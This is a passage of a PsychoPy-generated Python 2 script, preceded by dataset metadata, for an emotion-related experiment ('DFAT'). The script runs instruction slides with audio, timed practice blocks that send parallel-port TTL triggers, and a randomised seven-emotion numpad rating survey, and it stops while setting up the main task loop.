| 0.022787
| 0.173284
| 12,846
| 180
| 438
| 71.366667
| 0.85113
| 0.793554
| 0
| 0
| 0
| 0
| 0.07474
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.45
| false
| 0
| 0.1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 7
|
14a0a761b572574c7f31ac35eb23a1ca75a4d11b
| 62,705
|
py
|
Python
|
tasks/python/_dfat/dfat.py
|
risoms/mdl-R56
|
3f6f62f9e5f1aaf03e604c898e3d4b6b006f3436
|
[
"MIT"
] | null | null | null |
tasks/python/_dfat/dfat.py
|
risoms/mdl-R56
|
3f6f62f9e5f1aaf03e604c898e3d4b6b006f3436
|
[
"MIT"
] | null | null | null |
tasks/python/_dfat/dfat.py
|
risoms/mdl-R56
|
3f6f62f9e5f1aaf03e604c898e3d4b6b006f3436
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python2
# -*- coding: utf-8 -*-
"""
This experiment was created using PsychoPy2 Experiment Builder (v1.84.2),
on January 11, 2017, at 11:44
If you publish work using this script please cite the PsychoPy publications:
Peirce, JW (2007) PsychoPy - Psychophysics software in Python.
Journal of Neuroscience Methods, 162(1-2), 8-13.
Peirce, JW (2009) Generating stimuli for neuroscience using PsychoPy.
Frontiers in Neuroinformatics, 2:10. doi: 10.3389/neuro.11.010.2008
"""
from __future__ import absolute_import, division
from psychopy import gui, visual, core, data, event, logging, sound
from psychopy.constants import (NOT_STARTED, STARTED, FINISHED)
from numpy import random
import os # handy system and path functions
import sys # to get file system encoding
###-------added by me
#imports
from psychopy import parallel
#constants
stim_duration = 60 #stim duration (60)
# keys accepted as survey answers (numpad 1-7, one per rating point)
numpad_list = ['num_1','num_2','num_3','num_4','num_5','num_6','num_7']
# NOTE(review): address is passed as the *string* '0xDFF8'; PsychoPy accepts
# hex strings for the LPT base address on Windows -- confirm on the target rig.
pport = parallel.ParallelPort(address='0xDFF8')
pport.setData(int(0))  # clear all data pins before the experiment starts
prac_ttl = 1  # TTL code sent during practice task blocks; incremented per block
# Ensure that relative paths start from the same directory as this script
# (Python 2 only: str.decode does not exist on Python 3 str)
_thisDir = os.path.dirname(os.path.abspath(__file__)).decode(sys.getfilesystemencoding())
os.chdir(_thisDir)
# Store info about the experiment session
expName = 'DFAT' # from the Builder filename that created this script
expInfo = {u'session': u'001', u'participant': u''}
try: #look for pipe from app
    # participant id supplied as argv[1] by a wrapper application
    expInfo['participant'] = '%s'%(sys.argv[1])
    expInfo['session'] = '001'
except IndexError: #if no pipe, run normally
    print ('ran without app')
    dlg = gui.DlgFromDict(dictionary=expInfo, title=expName)
    if dlg.OK == False:
        print ('app closed')
        core.quit() # user pressed cancel
expInfo['date'] = data.getDateStr() # add a simple timestamp
expInfo['expName'] = expName
print 'subject:',expInfo['participant']
print 'exp:',expName
# Data file name stem = absolute path + name; later add .psyexp, .csv, .log, etc
filename = _thisDir + os.sep + u'data/%s_%s' % (expInfo['participant'], expName)
# An ExperimentHandler isn't essential but helps with data saving
thisExp = data.ExperimentHandler(name=expName, version='',
    extraInfo=expInfo, runtimeInfo=None,
    originPath=None,
    savePickle=True, saveWideText=True,
    dataFileName=filename)
# save a log file for detail verbose info
logFile = logging.LogFile(filename+'.log', level=logging.EXP)
logging.console.setLevel(logging.WARNING) # this outputs to the screen, not a file
endExpNow = False # flag for 'escape' or other condition => quit the exp
# Start Code - component code to be run before the window creation
# Setup the Window
win = visual.Window(
    size=[1920,1080], fullscr=True, screen=0,
    allowGUI=False, allowStencil=False,
    monitor='testMonitor', color=[1.000,1.000,1.000], colorSpace='rgb',
    blendMode='avg', useFBO=True,
    units='pix')
# store frame rate of monitor if we can measure it
expInfo['frameRate'] = win.getActualFrameRate()
if expInfo['frameRate'] != None:
    frameDur = 1.0 / round(expInfo['frameRate'])
else:
    frameDur = 1.0 / 60.0 # could not measure, so guess
# ---------------------------------------------------------------------------
# Initialize all visual/audio components and per-routine clocks up front.
# NOTE(review): the instructions/task/relax/survey/block_finish components are
# initialized TWICE below (Builder duplicated them for the practice and main
# phases); the second set simply rebinds the same names, so the duplication is
# redundant but harmless.
# ---------------------------------------------------------------------------
# Initialize components for Routine "introduction"
introductionClock = core.Clock()
intro_image = visual.ImageStim(
    win=win, name='intro_image',
    image=None, mask=None,
    ori=0, pos=[0, 0], size=None,
    color=[1,1,1], colorSpace='rgb', opacity=1,
    flipHoriz=False, flipVert=False,
    texRes=128, interpolate=True, depth=0.0)
intro_sound = sound.Sound(u'A', secs=-1)
intro_sound.setVolume(1)
#loop counter-practice
intro_repeat = 0
# Initialize components for Routine "instructions"
instructionsClock = core.Clock()
inst_image = visual.ImageStim(
    win=win, name='inst_image',
    image=None, mask=None,
    ori=0, pos=[0, 0], size=None,
    color=[1,1,1], colorSpace='rgb', opacity=1,
    flipHoriz=False, flipVert=False,
    texRes=128, interpolate=True, depth=0.0)
inst_sound = sound.Sound(u'A', secs=-1)
inst_sound.setVolume(1)
inst_repeat = 0
# Initialize components for Routine "task"
taskClock = core.Clock()
task_image = visual.ImageStim(
    win=win, name='task_image',
    image=None, mask=None,
    ori=0, pos=[0, 0], size=None,
    color=[1,1,1], colorSpace='rgb', opacity=1,
    flipHoriz=False, flipVert=False,
    texRes=128, interpolate=True, depth=0.0)
# Initialize components for Routine "relax"
relaxClock = core.Clock()
relax_image = visual.ImageStim(
    win=win, name='relax_image',
    image="Instructions/png/r-0.png", mask=None,
    ori=0, pos=[0, 0], size=None,
    color=[1,1,1], colorSpace='rgb', opacity=1,
    flipHoriz=False, flipVert=False,
    texRes=128, interpolate=True, depth=0.0)
relax_sound = sound.Sound(u'A', secs=-1)
relax_sound.setVolume(1)
# Initialize components for Routine "survey"
surveyClock = core.Clock()
survey_image = visual.ImageStim(
    win=win, name='survey_image',
    image=None, mask=None,
    ori=0, pos=[0, 0], size=None,
    color=[1,1,1], colorSpace='rgb', opacity=1,
    flipHoriz=False, flipVert=False,
    texRes=128, interpolate=True, depth=0.0)
# Initialize components for Routine "block_finish"
block_finishClock = core.Clock()
block_finish_image = visual.ImageStim(
    win=win, name='block_finish_image',
    image=None, mask=None,
    ori=0, pos=[0, 0], size=None,
    color=[1,1,1], colorSpace='rgb', opacity=1,
    flipHoriz=False, flipVert=False,
    texRes=128, interpolate=True, depth=0.0)
block_finish_sound = sound.Sound(u'A', secs=-1)
block_finish_sound.setVolume(1)
bf_repeat = 0
# Initialize components for Routine "task_introduction"
task_introductionClock = core.Clock()
task_intro_image = visual.ImageStim(
    win=win, name='task_intro_image',
    image=None, mask=None,
    ori=0, pos=[0, 0], size=None,
    color=[1,1,1], colorSpace='rgb', opacity=1,
    flipHoriz=False, flipVert=False,
    texRes=128, interpolate=True, depth=0.0)
task_intro_sound = sound.Sound(u'A', secs=-1)
task_intro_sound.setVolume(1)
# Initialize components for Routine "instructions"
# (duplicate of the block above; rebinds the same names)
instructionsClock = core.Clock()
inst_image = visual.ImageStim(
    win=win, name='inst_image',
    image=None, mask=None,
    ori=0, pos=[0, 0], size=None,
    color=[1,1,1], colorSpace='rgb', opacity=1,
    flipHoriz=False, flipVert=False,
    texRes=128, interpolate=True, depth=0.0)
inst_sound = sound.Sound(u'A', secs=-1)
inst_sound.setVolume(1)
inst_repeat = 0
# Initialize components for Routine "task"
taskClock = core.Clock()
task_image = visual.ImageStim(
    win=win, name='task_image',
    image=None, mask=None,
    ori=0, pos=[0, 0], size=None,
    color=[1,1,1], colorSpace='rgb', opacity=1,
    flipHoriz=False, flipVert=False,
    texRes=128, interpolate=True, depth=0.0)
# Initialize components for Routine "relax"
relaxClock = core.Clock()
relax_image = visual.ImageStim(
    win=win, name='relax_image',
    image="Instructions/png/r-0.png", mask=None,
    ori=0, pos=[0, 0], size=None,
    color=[1,1,1], colorSpace='rgb', opacity=1,
    flipHoriz=False, flipVert=False,
    texRes=128, interpolate=True, depth=0.0)
relax_sound = sound.Sound(u'A', secs=-1)
relax_sound.setVolume(1)
# Initialize components for Routine "survey"
surveyClock = core.Clock()
survey_image = visual.ImageStim(
    win=win, name='survey_image',
    image=None, mask=None,
    ori=0, pos=[0, 0], size=None,
    color=[1,1,1], colorSpace='rgb', opacity=1,
    flipHoriz=False, flipVert=False,
    texRes=128, interpolate=True, depth=0.0)
# Initialize components for Routine "block_finish"
block_finishClock = core.Clock()
block_finish_image = visual.ImageStim(
    win=win, name='block_finish_image',
    image=None, mask=None,
    ori=0, pos=[0, 0], size=None,
    color=[1,1,1], colorSpace='rgb', opacity=1,
    flipHoriz=False, flipVert=False,
    texRes=128, interpolate=True, depth=0.0)
block_finish_sound = sound.Sound(u'A', secs=-1)
block_finish_sound.setVolume(1)
bf_repeat = 0
# Initialize components for Routine "Finish"
FinishClock = core.Clock()
finish_image = visual.ImageStim(
    win=win, name='finish_image',
    image="Instructions/png/finish-0.png", mask=None,
    ori=0, pos=[0, 0], size=None,
    color=[1.000,1.000,1.000], colorSpace='rgb', opacity=1,
    flipHoriz=False, flipVert=False,
    texRes=128, interpolate=True, depth=0.0)
finish_sound = sound.Sound(u'A', secs=-1)
finish_sound.setVolume(1)
# Create some handy timers
globalClock = core.Clock() # to track the time since experiment started
routineTimer = core.CountdownTimer() # to track time remaining of each (non-slip) routine
# set up handler to look after randomisation of conditions etc
# (trialList=[None]: a bare repetition loop with no condition file)
intro_loop = data.TrialHandler(nReps=10, method='sequential',
    extraInfo=expInfo, originPath=-1,
    trialList=[None],
    seed=None, name='prac_intro_loop')
thisExp.addLoop(intro_loop) # add the loop to the experiment
thisIntro_loop = intro_loop.trialList[0] # so we can initialise stimuli with some values
# abbreviate parameter names if possible (e.g. rgb = thisIntro_loop.rgb)
# (no-op here since the trial is None; kept for Builder compatibility)
if thisIntro_loop != None:
    for paramName in thisIntro_loop.keys():
        exec(paramName + '= thisIntro_loop.' + paramName)
# Introduction: show one image + play one sound per repeat (int-0 .. int-9),
# advancing on the spacebar; 'escape' aborts the whole experiment.
for thisIntro_loop in intro_loop:
    currentLoop = intro_loop
    # abbreviate parameter names if possible (e.g. rgb = thisIntro_loop.rgb)
    if thisIntro_loop != None:
        for paramName in thisIntro_loop.keys():
            exec(paramName + '= thisIntro_loop.' + paramName)
    # ------Prepare to start Routine "introduction"-------
    t = 0
    introductionClock.reset() # clock
    frameN = -1
    continueRoutine = True
    # update component parameters for each repeat
    intro_key = event.BuilderKeyResponse()
    # intro_repeat selects the Nth slide/audio pair for this pass
    intro_image.setImage("Instructions/png/int-%s.png"%(intro_repeat))
    intro_sound.setSound("Instructions/wav/int-%s.wav"%(intro_repeat))
    # keep track of which components have finished
    introductionComponents = [intro_image, intro_key, intro_sound]
    for thisComponent in introductionComponents:
        if hasattr(thisComponent, 'status'):
            thisComponent.status = NOT_STARTED
    # -------Start Routine "introduction"-------
    while continueRoutine:
        # get current time
        t = introductionClock.getTime()
        frameN = frameN + 1 # number of completed frames (so 0 is the first frame)
        # update/draw components on each frame
        # *intro_image* updates
        if t >= 0.0 and intro_image.status == NOT_STARTED:
            # keep track of start time/frame for later
            intro_image.tStart = t
            intro_image.frameNStart = frameN # exact frame index
            intro_image.setAutoDraw(True)
        # *intro_key* updates
        if t >= 0.0 and intro_key.status == NOT_STARTED:
            # keep track of start time/frame for later
            intro_key.tStart = t
            intro_key.frameNStart = frameN # exact frame index
            intro_key.status = STARTED
            # keyboard checking is just starting
            event.clearEvents(eventType='keyboard')
        if intro_key.status == STARTED:
            theseKeys = event.getKeys(keyList=['space'])
            # check for quit:
            if "escape" in theseKeys:
                endExpNow = True
            if len(theseKeys) > 0: # at least one key was pressed
                # a response ends the routine
                continueRoutine = False
        # start/stop intro_sound
        if t >= 0.0 and intro_sound.status == NOT_STARTED:
            # keep track of start time/frame for later
            intro_sound.tStart = t
            intro_sound.frameNStart = frameN # exact frame index
            intro_sound.play() # start the sound (it finishes automatically)
        # check if all components have finished
        if not continueRoutine: # a component has requested a forced-end of Routine
            break
        continueRoutine = False # will revert to True if at least one component still running
        for thisComponent in introductionComponents:
            if hasattr(thisComponent, "status") and thisComponent.status != FINISHED:
                continueRoutine = True
                break # at least one component has not yet finished
        # check for quit (the Esc key)
        if endExpNow or event.getKeys(keyList=["escape"]):
            core.quit()
        # refresh the screen
        if continueRoutine: # don't flip if this routine is over or we'll get a blank screen
            win.flip()
    # -------Ending Routine "introduction"-------
    for thisComponent in introductionComponents:
        if hasattr(thisComponent, "setAutoDraw"):
            thisComponent.setAutoDraw(False)
    intro_sound.stop() # ensure sound has stopped at end of routine
    intro_repeat = intro_repeat+1
    # the Routine "introduction" was not non-slip safe, so reset the non-slip timer
    routineTimer.reset()
# completed 10 repeats of 'intro_loop'
# set up handler to look after randomisation of conditions etc
# Two practice blocks: each runs instructions -> timed task (with TTL
# triggers) -> relax -> survey -> block_finish.
prac_block = data.TrialHandler(nReps=2, method='sequential',
    extraInfo=expInfo, originPath=-1,
    trialList=[None],
    seed=None, name='block')
thisExp.addLoop(prac_block) # add the loop to the experiment
thisPrac_block = prac_block.trialList[0] # so we can initialise stimuli with some values
# abbreviate parameter names if possible (e.g. rgb = thisPrac_block.rgb)
if thisPrac_block != None:
    for paramName in thisPrac_block.keys():
        exec(paramName + '= thisPrac_block.' + paramName)
# Practice-block main loop (2 passes). Per pass: instruction slides, a
# stim_duration-second task with parallel-port TTL pulses, relax slides,
# a 7-item emotion survey, and a block-finish screen. prac_ttl (the TTL
# code written to the port) increments after each block.
for thisPrac_block in prac_block:
    currentLoop = prac_block
    # abbreviate parameter names if possible (e.g. rgb = thisPrac_block.rgb)
    if thisPrac_block != None:
        for paramName in thisPrac_block.keys():
            exec(paramName + '= thisPrac_block.' + paramName)
    # set up handler to look after randomisation of conditions etc
    # NOTE(review): nReps=3 here, but the comment after the loop says
    # "completed 2 repeats" -- confirm the intended number of repeats.
    prac_inst_loop = data.TrialHandler(nReps=3, method='sequential',
        extraInfo=expInfo, originPath=-1,
        trialList=[None],
        seed=None, name='inst_loop')
    thisExp.addLoop(prac_inst_loop) # add the loop to the experiment
    thisPrac_inst_loop = prac_inst_loop.trialList[0] # so we can initialise stimuli with some values
    # abbreviate parameter names if possible (e.g. rgb = thisPrac_inst_loop.rgb)
    if thisPrac_inst_loop != None:
        for paramName in thisPrac_inst_loop.keys():
            exec(paramName + '= thisPrac_inst_loop.' + paramName)
    for thisPrac_inst_loop in prac_inst_loop:
        currentLoop = prac_inst_loop
        # abbreviate parameter names if possible (e.g. rgb = thisPrac_inst_loop.rgb)
        if thisPrac_inst_loop != None:
            for paramName in thisPrac_inst_loop.keys():
                exec(paramName + '= thisPrac_inst_loop.' + paramName)
        # ------Prepare to start Routine "instructions"-------
        t = 0
        instructionsClock.reset() # clock
        frameN = -1
        continueRoutine = True
        # update component parameters for each repeat
        inst_key = event.BuilderKeyResponse()
        inst_image.setImage("Instructions/png/pi-%s.png"%(inst_repeat))
        #prevent loading of inst_sound for pi-0 and pi-2
        # NOTE(review): the comment above says pi-0 and pi-2 but the check
        # skips repeats 0 and 3 -- confirm which slides have no audio.
        if not (inst_repeat== 0 or inst_repeat== 3):
            inst_sound.setSound("Instructions/wav/pi-%s.wav"%(inst_repeat))
            instructionsComponents = [inst_image, inst_key, inst_sound]
        else:
            # keep track of which components have finished
            instructionsComponents = [inst_image, inst_key]
        for thisComponent in instructionsComponents:
            if hasattr(thisComponent, 'status'):
                thisComponent.status = NOT_STARTED
        # -------Start Routine "instructions"-------
        while continueRoutine:
            # get current time
            t = instructionsClock.getTime()
            frameN = frameN + 1 # number of completed frames (so 0 is the first frame)
            # update/draw components on each frame
            # *inst_image* updates
            if t >= 0.0 and inst_image.status == NOT_STARTED:
                # keep track of start time/frame for later
                inst_image.tStart = t
                inst_image.frameNStart = frameN # exact frame index
                inst_image.setAutoDraw(True)
            # *inst_key* updates
            if t >= 0.0 and inst_key.status == NOT_STARTED:
                # keep track of start time/frame for later
                inst_key.tStart = t
                inst_key.frameNStart = frameN # exact frame index
                inst_key.status = STARTED
                # keyboard checking is just starting
                event.clearEvents(eventType='keyboard')
            if inst_key.status == STARTED:
                theseKeys = event.getKeys(keyList=['space'])
                # check for quit:
                if "escape" in theseKeys:
                    endExpNow = True
                if len(theseKeys) > 0: # at least one key was pressed
                    # a response ends the routine
                    continueRoutine = False
            #prevent loading of inst_sound for pi-0 and pi-2
            if not (inst_repeat== 0 or inst_repeat== 3):
                # start/stop inst_sound
                if t >= 0.0 and inst_sound.status == NOT_STARTED:
                    # keep track of start time/frame for later
                    inst_sound.tStart = t
                    inst_sound.frameNStart = frameN # exact frame index
                    inst_sound.play() # start the sound (it finishes automatically)
            # check if all components have finished
            if not continueRoutine: # a component has requested a forced-end of Routine
                break
            continueRoutine = False # will revert to True if at least one component still running
            for thisComponent in instructionsComponents:
                if hasattr(thisComponent, "status") and thisComponent.status != FINISHED:
                    continueRoutine = True
                    break # at least one component has not yet finished
            # check for quit (the Esc key)
            if endExpNow or event.getKeys(keyList=["escape"]):
                core.quit()
            # refresh the screen
            if continueRoutine: # don't flip if this routine is over or we'll get a blank screen
                win.flip()
        # -------Ending Routine "instructions"-------
        for thisComponent in instructionsComponents:
            if hasattr(thisComponent, "setAutoDraw"):
                thisComponent.setAutoDraw(False)
        #prevent loading of inst_sound for pi-0 and pi-2
        if not (inst_repeat== 0 or inst_repeat== 3):
            inst_sound.stop() # ensure sound has stopped at end of routine
        inst_repeat = inst_repeat+1
        # the Routine "instructions" was not non-slip safe, so reset the non-slip timer
        routineTimer.reset()
    # completed 2 repeats of 'prac_inst_loop'
    # ------Prepare to start Routine "task"-------
    t = 0
    t_0 = 0
    t_1 = 0
    taskClock.reset() # clock
    frameN = -1
    continueRoutine = True
    routineTimer.add(stim_duration)
    # update component parameters for each repeat
    # keep track of which components have finished
    taskComponents = [task_image]
    for thisComponent in taskComponents:
        if hasattr(thisComponent, 'status'):
            thisComponent.status = NOT_STARTED
    # -------Start Routine "task"-------
    while continueRoutine and routineTimer.getTime() > 0:
        # get current time
        t = taskClock.getTime()
        frameN = frameN + 1 # number of completed frames (so 0 is the first frame)
        # update/draw components on each frame
        # *task_image* updates
        if t >= 0.0 and task_image.status == NOT_STARTED:
            # keep track of start time/frame for later
            task_image.tStart = t
            task_image.frameNStart = frameN # exact frame index
            task_image.setAutoDraw(True)
        frameRemains = 0.0 + stim_duration- win.monitorFramePeriod * 0.75 # most of one frame period left
        if task_image.status == STARTED and t >= frameRemains:
            task_image.setAutoDraw(False)
        #task trigger
        # Port is cleared every frame; every >=500 ms a one-frame pulse of
        # the current block code (prac_ttl) is written to the parallel port.
        t = taskClock.getTime()
        t_1 = t
        pport.setData(int(0))
        if (t_1 - t_0) >= .500:
            pport.setData(int(prac_ttl))
            t_0 = t
        # check if all components have finished
        if not continueRoutine: # a component has requested a forced-end of Routine
            break
        continueRoutine = False # will revert to True if at least one component still running
        for thisComponent in taskComponents:
            if hasattr(thisComponent, "status") and thisComponent.status != FINISHED:
                continueRoutine = True
                break # at least one component has not yet finished
        # check for quit (the Esc key)
        if endExpNow or event.getKeys(keyList=["escape"]):
            core.quit()
        # refresh the screen
        if continueRoutine: # don't flip if this routine is over or we'll get a blank screen
            win.flip()
    # -------Ending Routine "task"-------
    for thisComponent in taskComponents:
        if hasattr(thisComponent, "setAutoDraw"):
            thisComponent.setAutoDraw(False)
    # set up handler to look after randomisation of conditions etc
    prac_relax_loop = data.TrialHandler(nReps=2, method='sequential',
        extraInfo=expInfo, originPath=-1,
        trialList=[None],
        seed=None, name='relax_loop')
    thisExp.addLoop(prac_relax_loop) # add the loop to the experiment
    thisPrac_relax_loop = prac_relax_loop.trialList[0] # so we can initialise stimuli with some values
    # abbreviate parameter names if possible (e.g. rgb = thisPrac_relax_loop.rgb)
    if thisPrac_relax_loop != None:
        for paramName in thisPrac_relax_loop.keys():
            exec(paramName + '= thisPrac_relax_loop.' + paramName)
    relax_repeat = 0
    for thisPrac_relax_loop in prac_relax_loop:
        currentLoop = prac_relax_loop
        # abbreviate parameter names if possible (e.g. rgb = thisPrac_relax_loop.rgb)
        if thisPrac_relax_loop != None:
            for paramName in thisPrac_relax_loop.keys():
                exec(paramName + '= thisPrac_relax_loop.' + paramName)
        # ------Prepare to start Routine "relax"-------
        t = 0
        relaxClock.reset() # clock
        frameN = -1
        continueRoutine = True
        # update component parameters for each repeat
        relax_key = event.BuilderKeyResponse()
        relax_image.setImage("Instructions/png/r-%s.png"%(relax_repeat))
        relax_sound.setSound("Instructions/wav/r-%s.wav"%(relax_repeat))
        # keep track of which components have finished
        relaxComponents = [relax_image, relax_key, relax_sound]
        for thisComponent in relaxComponents:
            if hasattr(thisComponent, 'status'):
                thisComponent.status = NOT_STARTED
        # -------Start Routine "relax"-------
        while continueRoutine:
            # get current time
            t = relaxClock.getTime()
            frameN = frameN + 1 # number of completed frames (so 0 is the first frame)
            # update/draw components on each frame
            # *relax_image* updates
            if t >= 0.0 and relax_image.status == NOT_STARTED:
                # keep track of start time/frame for later
                relax_image.tStart = t
                relax_image.frameNStart = frameN # exact frame index
                relax_image.setAutoDraw(True)
            # *relax_key* updates
            if t >= 0.0 and relax_key.status == NOT_STARTED:
                # keep track of start time/frame for later
                relax_key.tStart = t
                relax_key.frameNStart = frameN # exact frame index
                relax_key.status = STARTED
                # keyboard checking is just starting
                event.clearEvents(eventType='keyboard')
            if relax_key.status == STARTED:
                theseKeys = event.getKeys(keyList=['space'])
                # check for quit:
                if "escape" in theseKeys:
                    endExpNow = True
                if len(theseKeys) > 0: # at least one key was pressed
                    # a response ends the routine
                    continueRoutine = False
            # start/stop relax_sound
            if t >= 0.0 and relax_sound.status == NOT_STARTED:
                # keep track of start time/frame for later
                relax_sound.tStart = t
                relax_sound.frameNStart = frameN # exact frame index
                relax_sound.play() # start the sound (it finishes automatically)
            # check if all components have finished
            if not continueRoutine: # a component has requested a forced-end of Routine
                break
            continueRoutine = False # will revert to True if at least one component still running
            for thisComponent in relaxComponents:
                if hasattr(thisComponent, "status") and thisComponent.status != FINISHED:
                    continueRoutine = True
                    break # at least one component has not yet finished
            # check for quit (the Esc key)
            if endExpNow or event.getKeys(keyList=["escape"]):
                core.quit()
            # refresh the screen
            if continueRoutine: # don't flip if this routine is over or we'll get a blank screen
                win.flip()
        # -------Ending Routine "relax"-------
        for thisComponent in relaxComponents:
            if hasattr(thisComponent, "setAutoDraw"):
                thisComponent.setAutoDraw(False)
        relax_sound.stop() # ensure sound has stopped at end of routine
        relax_repeat = relax_repeat+1
        # the Routine "relax" was not non-slip safe, so reset the non-slip timer
        routineTimer.reset()
    # completed 2 repeats of 'prac_relax_loop'
    # set up handler to look after randomisation of conditions etc
    prac_survey_loop = data.TrialHandler(nReps=7, method='random',
        extraInfo=expInfo, originPath=-1,
        trialList=[None],
        seed=None, name='survey_loop')
    thisExp.addLoop(prac_survey_loop) # add the loop to the experiment
    thisPrac_survey_loop = prac_survey_loop.trialList[0] # so we can initialise stimuli with some values
    # abbreviate parameter names if possible (e.g. rgb = thisPrac_survey_loop.rgb)
    if thisPrac_survey_loop != None:
        for paramName in thisPrac_survey_loop.keys():
            exec(paramName + '= thisPrac_survey_loop.' + paramName)
    #reset survey
    # One survey screen per emotion, presented in shuffled order; each repeat
    # pops the next emotion from the shuffled list.
    lsurvey = ['anger','discomfort','disgust','fear','happiness','interest','sadness']#list of questions types
    random.shuffle(lsurvey)
    print(lsurvey)
    for thisPrac_survey_loop in prac_survey_loop:
        currentLoop = prac_survey_loop
        # abbreviate parameter names if possible (e.g. rgb = thisPrac_survey_loop.rgb)
        if thisPrac_survey_loop != None:
            for paramName in thisPrac_survey_loop.keys():
                exec(paramName + '= thisPrac_survey_loop.' + paramName)
        # ------Prepare to start Routine "survey"-------
        t = 0
        surveyClock.reset() # clock
        frameN = -1
        continueRoutine = True
        # update component parameters for each repeat
        survey_key = event.BuilderKeyResponse()
        surveyType = lsurvey.pop(0)
        survey_image.setImage("Instructions/png/%s.png"%(surveyType))
        # keep track of which components have finished
        surveyComponents = [survey_image, survey_key]
        for thisComponent in surveyComponents:
            if hasattr(thisComponent, 'status'):
                thisComponent.status = NOT_STARTED
        # -------Start Routine "survey"-------
        while continueRoutine:
            # get current time
            t = surveyClock.getTime()
            frameN = frameN + 1 # number of completed frames (so 0 is the first frame)
            # update/draw components on each frame
            # *survey_image* updates
            if t >= 0.0 and survey_image.status == NOT_STARTED:
                # keep track of start time/frame for later
                survey_image.tStart = t
                survey_image.frameNStart = frameN # exact frame index
                survey_image.setAutoDraw(True)
            # *survey_key* updates
            if t >= 0.0 and survey_key.status == NOT_STARTED:
                # keep track of start time/frame for later
                survey_key.tStart = t
                survey_key.frameNStart = frameN # exact frame index
                survey_key.status = STARTED
                # keyboard checking is just starting
                win.callOnFlip(survey_key.clock.reset) # t=0 on next screen flip
                event.clearEvents(eventType='keyboard')
            if survey_key.status == STARTED:
                # only numpad 1-7 are accepted as answers
                theseKeys = event.getKeys(keyList=numpad_list)
                # check for quit:
                if "escape" in theseKeys:
                    endExpNow = True
                if len(theseKeys) > 0: # at least one key was pressed
                    if survey_key.keys == []: # then this was the first keypress
                        survey_key.keys = theseKeys[0] # just the first key pressed
                        survey_key.rt = survey_key.clock.getTime()
                    # a response ends the routine
                    continueRoutine = False
            # check if all components have finished
            if not continueRoutine: # a component has requested a forced-end of Routine
                break
            continueRoutine = False # will revert to True if at least one component still running
            for thisComponent in surveyComponents:
                if hasattr(thisComponent, "status") and thisComponent.status != FINISHED:
                    continueRoutine = True
                    break # at least one component has not yet finished
            # check for quit (the Esc key)
            if endExpNow or event.getKeys(keyList=["escape"]):
                core.quit()
            # refresh the screen
            if continueRoutine: # don't flip if this routine is over or we'll get a blank screen
                win.flip()
        # -------Ending Routine "survey"-------
        for thisComponent in surveyComponents:
            if hasattr(thisComponent, "setAutoDraw"):
                thisComponent.setAutoDraw(False)
        # check responses
        if survey_key.keys in ['', [], None]: # No response was made
            survey_key.keys=None
        prac_survey_loop.addData('survey_key.keys',survey_key.keys)
        if survey_key.keys != None: # we had a response
            prac_survey_loop.addData('survey_key.rt', survey_key.rt)
        # the Routine "survey" was not non-slip safe, so reset the non-slip timer
        # blockType records which practice block this survey belongs to
        prac_survey_loop.addData('surveyType', surveyType)
        prac_survey_loop.addData('blockType', 'pb%s'%(prac_ttl-1))
        routineTimer.reset()
        thisExp.nextEntry()
        print(survey_key.keys)
    # completed 7 repeats of 'prac_survey_loop'
    # ------Prepare to start Routine "block_finish"-------
    t = 0
    block_finishClock.reset() # clock
    frameN = -1
    continueRoutine = True
    # update component parameters for each repeat
    block_finish_key = event.BuilderKeyResponse()
    block_finish_image.setImage("Instructions/png/bf-%s.png"%(bf_repeat))
    block_finish_sound.setSound("Instructions/wav/bf-%s.wav"%(bf_repeat))
    # keep track of which components have finished
    block_finishComponents = [block_finish_image, block_finish_key, block_finish_sound]
    for thisComponent in block_finishComponents:
        if hasattr(thisComponent, 'status'):
            thisComponent.status = NOT_STARTED
    # -------Start Routine "block_finish"-------
    while continueRoutine:
        # get current time
        t = block_finishClock.getTime()
        frameN = frameN + 1 # number of completed frames (so 0 is the first frame)
        # update/draw components on each frame
        # *block_finish_image* updates
        if t >= 0.0 and block_finish_image.status == NOT_STARTED:
            # keep track of start time/frame for later
            block_finish_image.tStart = t
            block_finish_image.frameNStart = frameN # exact frame index
            block_finish_image.setAutoDraw(True)
        # *block_finish_key* updates
        if t >= 0.0 and block_finish_key.status == NOT_STARTED:
            # keep track of start time/frame for later
            block_finish_key.tStart = t
            block_finish_key.frameNStart = frameN # exact frame index
            block_finish_key.status = STARTED
            # keyboard checking is just starting
            event.clearEvents(eventType='keyboard')
        if block_finish_key.status == STARTED:
            theseKeys = event.getKeys(keyList=['space'])
            # check for quit:
            if "escape" in theseKeys:
                endExpNow = True
            if len(theseKeys) > 0: # at least one key was pressed
                # a response ends the routine
                continueRoutine = False
        # start/stop block_finish_sound
        if t >= 0.0 and block_finish_sound.status == NOT_STARTED:
            # keep track of start time/frame for later
            block_finish_sound.tStart = t
            block_finish_sound.frameNStart = frameN # exact frame index
            block_finish_sound.play() # start the sound (it finishes automatically)
        # check if all components have finished
        if not continueRoutine: # a component has requested a forced-end of Routine
            break
        continueRoutine = False # will revert to True if at least one component still running
        for thisComponent in block_finishComponents:
            if hasattr(thisComponent, "status") and thisComponent.status != FINISHED:
                continueRoutine = True
                break # at least one component has not yet finished
        # check for quit (the Esc key)
        if endExpNow or event.getKeys(keyList=["escape"]):
            core.quit()
        # refresh the screen
        if continueRoutine: # don't flip if this routine is over or we'll get a blank screen
            win.flip()
    # -------Ending Routine "block_finish"-------
    for thisComponent in block_finishComponents:
        if hasattr(thisComponent, "setAutoDraw"):
            thisComponent.setAutoDraw(False)
    block_finish_sound.stop() # ensure sound has stopped at end of routine
    bf_repeat = bf_repeat+1
    # the Routine "block_finish" was not non-slip safe, so reset the non-slip timer
    routineTimer.reset()
    # next practice block gets the next TTL code
    prac_ttl = prac_ttl + 1
# completed 2 repeats of 'prac_block'
# Practice phase done: reset slide counters before the main task phase.
inst_repeat = 0 #reset
intro_repeat = 0 #reset
# set up handler to look after randomisation of conditions etc
task_intro_loop = data.TrialHandler(nReps=5, method='sequential',
    extraInfo=expInfo, originPath=-1,
    trialList=[None],
    seed=None, name='task_intro_loop')
thisExp.addLoop(task_intro_loop) # add the loop to the experiment
thisTask_intro_loop = task_intro_loop.trialList[0] # so we can initialise stimuli with some values
